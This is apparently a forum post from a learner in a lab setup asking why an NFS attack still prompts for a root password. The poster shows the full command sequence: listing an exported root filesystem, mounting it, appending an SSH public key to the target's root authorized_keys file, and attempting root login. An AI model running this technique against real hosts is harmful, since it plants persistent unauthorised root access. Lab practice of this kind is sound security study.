Hi,
I am trying to exploit the NFS service in Metasploit but it seems that I missing something, at the end I am always being asked for a password.

kali@kali:~$ sudo showmount -e 192.168.56.103
[sudo] password for kali:
Export list for 192.168.56.103:
/ *
kali@kali:~$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa):
/home/kali/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/.ssh/id_rsa.
Your public key has been saved in /home/kali/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:4woBUFdP6+r0Zglh9Uzjbm/YCDIoFqCItRJ9rlgWCHg kali@kali
The key's randomart image is:
+---[RSA 3072]----+
|=+. ... . |
|=.E.. o..o |
|+=.= .o= . |
|= =.. o. + |
| = o.o .S. |
|. + ..+o..o |
| . .. o+.+ = |
| + o+ o + |
| oo. . |
+----[SHA256]-----+
kali@kali:~$ mkdir /tmp/tempkey
kali@kali:~$ sudo mount -t nfs 192.168.56.103:/ /tmp/tempkey/
kali@kali:~$ cat ~/.ssh/id_rsa.pub >> /tmp/tempkey/root/.ssh/authorized_keys
kali@kali:~$ sudo umount /tmp/tempkey/
kali@kali:~$ ssh [email protected]
[email protected]'s password: (WHY ?!!)



NFSProblem.jpg

What I am missing.

Thanks